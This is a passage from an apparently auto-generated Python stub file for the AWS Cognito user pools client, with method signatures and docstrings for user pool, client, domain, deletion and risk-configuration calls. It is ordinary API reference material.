In a push model, event sources (such as Amazon S3 and custom applications) need permission to invoke a function. So you will need to make an extra call to add permission for these event sources to invoke your Lambda function.
For more information on using the Lambda API to add permission, see `AddPermission <https://docs.aws.amazon.com/lambda/latest/dg/API_AddPermission.html>`__ .
For adding permission using the AWS CLI, see `add-permission <https://docs.aws.amazon.com/cli/latest/reference/lambda/add-permission.html>`__ .
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes:
The attributes to be auto-verified. Possible values: **email** , **phone_number** .
- *(string) --*
:type AliasAttributes: list
:param AliasAttributes:
Attributes supported as an alias for this user pool. Possible values: **phone_number** , **email** , or **preferred_username** .
- *(string) --*
:type UsernameAttributes: list
:param UsernameAttributes:
Specifies whether email addresses or phone numbers can be specified as usernames when a user signs up.
- *(string) --*
:type SmsVerificationMessage: string
:param SmsVerificationMessage:
A string representing the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage:
A string representing the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject:
A string representing the email verification subject.
:type VerificationMessageTemplate: dict
:param VerificationMessageTemplate:
The template for the verification message that the user sees when the app requests permission to access the user\'s information.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage:
A string representing the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration:
Specifies MFA configuration details.
:type DeviceConfiguration: dict
:param DeviceConfiguration:
The device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration:
The email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
:type SmsConfiguration: dict
:param SmsConfiguration:
The SMS configuration.
- **SnsCallerArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
:type UserPoolTags: dict
:param UserPoolTags:
The tag keys and values to assign to the user pool. A tag is a label that you can use to categorize and manage user pools in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig:
The configuration for ``AdminCreateUser`` requests.
- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``\"RESEND\"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
:type Schema: list
:param Schema:
An array of schema attributes for the new user pool. These attributes can be standard or custom attributes.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that\'s mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
:type UserPoolAddOns: dict
:param UserPoolAddOns:
Used to enable advanced security risk detection. Set the key ``AdvancedSecurityMode`` to the value \"AUDIT\".
- **AdvancedSecurityMode** *(string) --* **[REQUIRED]**
The advanced security mode.
:rtype: dict
:returns:
"""
pass
def create_user_pool_client(self, UserPoolId: str, ClientName: str, GenerateSecret: bool = None, RefreshTokenValidity: int = None, ReadAttributes: List = None, WriteAttributes: List = None, ExplicitAuthFlows: List = None, SupportedIdentityProviders: List = None, CallbackURLs: List = None, LogoutURLs: List = None, DefaultRedirectURI: str = None, AllowedOAuthFlows: List = None, AllowedOAuthScopes: List = None, AllowedOAuthFlowsUserPoolClient: bool = None, AnalyticsConfiguration: Dict = None) -> Dict:
"""
Creates the user pool client.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserPoolClient>`_
**Request Syntax**
::
response = client.create_user_pool_client(
UserPoolId='string',
ClientName='string',
GenerateSecret=True|False,
RefreshTokenValidity=123,
ReadAttributes=[
'string',
],
WriteAttributes=[
'string',
],
ExplicitAuthFlows=[
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
SupportedIdentityProviders=[
'string',
],
CallbackURLs=[
'string',
],
LogoutURLs=[
'string',
],
DefaultRedirectURI='string',
AllowedOAuthFlows=[
'code'|'implicit'|'client_credentials',
],
AllowedOAuthScopes=[
'string',
],
AllowedOAuthFlowsUserPoolClient=True|False,
AnalyticsConfiguration={
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
)
**Response Syntax**
::
{
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False,
'AnalyticsConfiguration': {
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to create a user pool client.
- **UserPoolClient** *(dict) --*
The user pool client that was just created.
- **UserPoolId** *(string) --*
The user pool ID for the user pool client.
- **ClientName** *(string) --*
The client name from the user pool request of the client type.
- **ClientId** *(string) --*
The ID of the client associated with the user pool.
- **ClientSecret** *(string) --*
The client secret from the user pool request of the client type.
- **LastModifiedDate** *(datetime) --*
The date the user pool client was last modified.
- **CreationDate** *(datetime) --*
The date the user pool client was created.
- **RefreshTokenValidity** *(integer) --*
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
- **ReadAttributes** *(list) --*
The Read-only attributes.
- *(string) --*
- **WriteAttributes** *(list) --*
The writeable attributes.
- *(string) --*
- **ExplicitAuthFlows** *(list) --*
The explicit authentication flows.
- *(string) --*
- **SupportedIdentityProviders** *(list) --*
A list of provider names for the identity providers that are supported on this client.
- *(string) --*
- **CallbackURLs** *(list) --*
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
- **LogoutURLs** *(list) --*
A list of allowed logout URLs for the identity providers.
- *(string) --*
- **DefaultRedirectURI** *(string) --*
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- **AllowedOAuthFlows** *(list) --*
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to ``token`` to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
- *(string) --*
- **AllowedOAuthScopes** *(list) --*
A list of allowed ``OAuth`` scopes. Currently supported values are ``"phone"`` , ``"email"`` , ``"openid"`` , and ``"Cognito"`` .
- *(string) --*
- **AllowedOAuthFlowsUserPoolClient** *(boolean) --*
Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
- **AnalyticsConfiguration** *(dict) --*
The Amazon Pinpoint analytics configuration for the user pool client.
- **ApplicationId** *(string) --*
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --*
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --*
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to create a user pool client.
:type ClientName: string
:param ClientName: **[REQUIRED]**
The client name for the user pool client you would like to create.
:type GenerateSecret: boolean
:param GenerateSecret:
Boolean to specify whether you want to generate a secret for the user pool client being created.
:type RefreshTokenValidity: integer
:param RefreshTokenValidity:
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
:type ReadAttributes: list
:param ReadAttributes:
The read attributes.
- *(string) --*
:type WriteAttributes: list
:param WriteAttributes:
The user pool attributes that the app client can write to.
If your app client allows users to sign in through an identity provider, this array must include all attributes that are mapped to identity provider attributes. Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If your app client lacks write access to a mapped attribute, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- *(string) --*
:type ExplicitAuthFlows: list
:param ExplicitAuthFlows:
The explicit authentication flows.
- *(string) --*
:type SupportedIdentityProviders: list
:param SupportedIdentityProviders:
A list of provider names for the identity providers that are supported on this client. The following are supported: ``COGNITO`` , ``Facebook`` , ``Google`` and ``LoginWithAmazon`` .
- *(string) --*
:type CallbackURLs: list
:param CallbackURLs:
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
:type LogoutURLs: list
:param LogoutURLs:
A list of allowed logout URLs for the identity providers.
- *(string) --*
:type DefaultRedirectURI: string
:param DefaultRedirectURI:
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
:type AllowedOAuthFlows: list
:param AllowedOAuthFlows:
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to ``token`` to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
- *(string) --*
:type AllowedOAuthScopes: list
:param AllowedOAuthScopes:
A list of allowed ``OAuth`` scopes. Currently supported values are ``\"phone\"`` , ``\"email\"`` , ``\"openid\"`` , and ``\"Cognito\"`` .
- *(string) --*
:type AllowedOAuthFlowsUserPoolClient: boolean
:param AllowedOAuthFlowsUserPoolClient:
Set to ``True`` if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
:type AnalyticsConfiguration: dict
:param AnalyticsConfiguration:
The Amazon Pinpoint analytics configuration for collecting metrics for this user pool.
- **ApplicationId** *(string) --* **[REQUIRED]**
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --* **[REQUIRED]**
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --* **[REQUIRED]**
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:rtype: dict
:returns:
"""
pass
def create_user_pool_domain(self, Domain: str, UserPoolId: str, CustomDomainConfig: Dict = None) -> Dict:
"""
Creates a new domain for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserPoolDomain>`_
**Request Syntax**
::
response = client.create_user_pool_domain(
Domain='string',
UserPoolId='string',
CustomDomainConfig={
'CertificateArn': 'string'
}
)
**Response Syntax**
::
{
'CloudFrontDomain': 'string'
}
**Response Structure**
- *(dict) --*
- **CloudFrontDomain** *(string) --*
The Amazon CloudFront endpoint that you use as the target of the alias that you set up with your Domain Name Service (DNS) provider.
:type Domain: string
:param Domain: **[REQUIRED]**
The domain string.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type CustomDomainConfig: dict
:param CustomDomainConfig:
The configuration for a custom domain that hosts the sign-up and sign-in webpages for your application.
Provide this parameter only if you want to use a custom domain for your user pool. Otherwise, you can exclude this parameter and use the Amazon Cognito hosted domain instead.
For more information about the hosted domain and custom domains, see `Configuring a User Pool Domain <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-assign-domain.html>`__ .
- **CertificateArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an AWS Certificate Manager SSL certificate. You use this certificate for the subdomain of your custom domain.
:rtype: dict
:returns:
"""
pass
def delete_group(self, GroupName: str, UserPoolId: str):
"""
Deletes a group. Currently only groups with no members can be deleted.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteGroup>`_
**Request Syntax**
::
response = client.delete_group(
GroupName='string',
UserPoolId='string'
)
:type GroupName: string
:param GroupName: **[REQUIRED]**
The name of the group.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:returns: None
"""
pass
def delete_identity_provider(self, UserPoolId: str, ProviderName: str):
"""
Deletes an identity provider for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteIdentityProvider>`_
**Request Syntax**
::
response = client.delete_identity_provider(
UserPoolId='string',
ProviderName='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type ProviderName: string
:param ProviderName: **[REQUIRED]**
The identity provider name.
:returns: None
"""
pass
def delete_resource_server(self, UserPoolId: str, Identifier: str):
"""
Deletes a resource server.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteResourceServer>`_
**Request Syntax**
::
response = client.delete_resource_server(
UserPoolId='string',
Identifier='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that hosts the resource server.
:type Identifier: string
:param Identifier: **[REQUIRED]**
The identifier for the resource server.
:returns: None
"""
pass
def delete_user(self, AccessToken: str):
"""
Allows a user to delete himself or herself.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUser>`_
**Request Syntax**
::
response = client.delete_user(
AccessToken='string'
)
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token from a request to delete a user.
:returns: None
"""
pass
def delete_user_attributes(self, UserAttributeNames: List, AccessToken: str) -> Dict:
"""
Deletes the attributes for a user.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserAttributes>`_
**Request Syntax**
::
response = client.delete_user_attributes(
UserAttributeNames=[
'string',
],
AccessToken='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server to delete user attributes.
:type UserAttributeNames: list
:param UserAttributeNames: **[REQUIRED]**
An array of strings representing the user attribute names you wish to delete.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
- *(string) --*
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token used in the request to delete user attributes.
:rtype: dict
:returns:
"""
pass
def delete_user_pool(self, UserPoolId: str):
"""
Deletes the specified Amazon Cognito user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserPool>`_
**Request Syntax**
::
response = client.delete_user_pool(
UserPoolId='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool you want to delete.
:returns: None
"""
pass
def delete_user_pool_client(self, UserPoolId: str, ClientId: str):
"""
Allows the developer to delete the user pool client.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserPoolClient>`_
**Request Syntax**
::
response = client.delete_user_pool_client(
UserPoolId='string',
ClientId='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to delete the client.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID of the app associated with the user pool.
:returns: None
"""
pass
def delete_user_pool_domain(self, Domain: str, UserPoolId: str) -> Dict:
"""
Deletes a domain for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserPoolDomain>`_
**Request Syntax**
::
response = client.delete_user_pool_domain(
Domain='string',
UserPoolId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type Domain: string
:param Domain: **[REQUIRED]**
The domain string.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:rtype: dict
:returns:
"""
pass
def describe_identity_provider(self, UserPoolId: str, ProviderName: str) -> Dict:
"""
Gets information about a specific identity provider.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeIdentityProvider>`_
**Request Syntax**
::
response = client.describe_identity_provider(
UserPoolId='string',
ProviderName='string'
)
**Response Syntax**
::
{
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **IdentityProvider** *(dict) --*
The identity provider that was deleted.
- **UserPoolId** *(string) --*
The user pool ID.
- **ProviderName** *(string) --*
The identity provider name.
- **ProviderType** *(string) --*
The identity provider type.
- **ProviderDetails** *(dict) --*
The identity provider details, such as ``MetadataURL`` and ``MetadataFile`` .
- *(string) --*
- *(string) --*
- **AttributeMapping** *(dict) --*
A mapping of identity provider attributes to standard and custom user pool attributes.
- *(string) --*
- *(string) --*
- **IdpIdentifiers** *(list) --*
A list of identity provider identifiers.
- *(string) --*
- **LastModifiedDate** *(datetime) --*
The date the identity provider was last modified.
- **CreationDate** *(datetime) --*
The date the identity provider was created.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type ProviderName: string
:param ProviderName: **[REQUIRED]**
The identity provider name.
:rtype: dict
:returns:
"""
pass
def describe_resource_server(self, UserPoolId: str, Identifier: str) -> Dict:
"""
Describes a resource server.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeResourceServer>`_
**Request Syntax**
::
response = client.describe_resource_server(
UserPoolId='string',
Identifier='string'
)
**Response Syntax**
::
{
'ResourceServer': {
'UserPoolId': 'string',
'Identifier': 'string',
'Name': 'string',
'Scopes': [
{
'ScopeName': 'string',
'ScopeDescription': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ResourceServer** *(dict) --*
The resource server.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that hosts the resource server.
- **Identifier** *(string) --*
The identifier for the resource server.
- **Name** *(string) --*
The name of the resource server.
- **Scopes** *(list) --*
A list of scopes that are defined for the resource server.
- *(dict) --*
A resource server scope.
- **ScopeName** *(string) --*
The name of the scope.
- **ScopeDescription** *(string) --*
A description of the scope.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that hosts the resource server.
:type Identifier: string
:param Identifier: **[REQUIRED]**
The identifier for the resource server
:rtype: dict
:returns:
"""
pass
def describe_risk_configuration(self, UserPoolId: str, ClientId: str = None) -> Dict:
"""
Describes the risk configuration.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeRiskConfiguration>`_
**Request Syntax**
::
response = client.describe_risk_configuration(
UserPoolId='string',
ClientId='string'
)
**Response Syntax**
::
{
'RiskConfiguration': {
'UserPoolId': 'string',
'ClientId': 'string',
'CompromisedCredentialsRiskConfiguration': {
'EventFilter': [
'SIGN_IN'|'PASSWORD_CHANGE'|'SIGN_UP',
],
'Actions': {
'EventAction': 'BLOCK'|'NO_ACTION'
}
},
'AccountTakeoverRiskConfiguration': {
'NotifyConfiguration': {
'From': 'string',
'ReplyTo': 'string',
'SourceArn': 'string',
'BlockEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
},
'NoActionEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
},
'MfaEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
}
},
'Actions': {
'LowAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
},
'MediumAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
},
'HighAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
}
}
},
'RiskExceptionConfiguration': {
'BlockedIPRangeList': [
'string',
],
'SkippedIPRangeList': [
'string',
]
},
'LastModifiedDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **RiskConfiguration** *(dict) --*
The risk configuration.
- **UserPoolId** *(string) --*
The user pool ID.
- **ClientId** *(string) --*
The app client ID.
- **CompromisedCredentialsRiskConfiguration** *(dict) --*
The compromised credentials risk configuration object including the ``EventFilter`` and the ``EventAction``
- **EventFilter** *(list) --*
Perform the action for these events. The default is to perform all events if no event filter is specified.
- *(string) --*
- **Actions** *(dict) --*
The compromised credentials risk configuration actions.
- **EventAction** *(string) --*
The event action.
- **AccountTakeoverRiskConfiguration** *(dict) --*
The account takeover risk configuration object including the ``NotifyConfiguration`` object and ``Actions`` to take in the case of an account takeover.
- **NotifyConfiguration** *(dict) --*
The notify configuration used to construct email notifications.
- **From** *(string) --*
The email address that is sending the email. It must be either individually verified with Amazon SES, or from a domain that has been verified with Amazon SES.
- **ReplyTo** *(string) --*
The destination to which the receiver of an email should reply to.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of the identity that is associated with the sending authorization policy. It permits Amazon Cognito to send for the email address specified in the ``From`` parameter.
- **BlockEmail** *(dict) --*
Email template used when a detected risk event is blocked.
- **Subject** *(string) --*
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **NoActionEmail** *(dict) --*
The email template used when a detected risk event is allowed.
- **Subject** *(string) --*
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **MfaEmail** *(dict) --*
The MFA email template used when MFA is challenged as part of a detected risk.
- **Subject** *(string) --*
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **Actions** *(dict) --*
Account takeover risk configuration actions
- **LowAction** *(dict) --*
Action to take for a low risk.
- **Notify** *(boolean) --*
Flag specifying whether to send a notification.
- **EventAction** *(string) --*
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **MediumAction** *(dict) --*
Action to take for a medium risk.
- **Notify** *(boolean) --*
Flag specifying whether to send a notification.
- **EventAction** *(string) --*
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **HighAction** *(dict) --*
Action to take for a high risk.
- **Notify** *(boolean) --*
Flag specifying whether to send a notification.
- **EventAction** *(string) --*
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **RiskExceptionConfiguration** *(dict) --*
The configuration to override the risk decision.
- **BlockedIPRangeList** *(list) --*
Overrides the risk decision to always block the pre-authentication requests. The IP range is in CIDR notation: a compact representation of an IP address and its associated routing prefix.
- *(string) --*
- **SkippedIPRangeList** *(list) --*
Risk detection is not performed on the IP addresses in the range list. The IP range is in CIDR notation.
- *(string) --*
- **LastModifiedDate** *(datetime) --*
The last modified date.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type ClientId: string
:param ClientId:
The app client ID.
:rtype: dict
:returns:
"""
pass
def describe_user_import_job(self, UserPoolId: str, JobId: str) -> Dict:
"""
Describes the user import job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserImportJob>`_
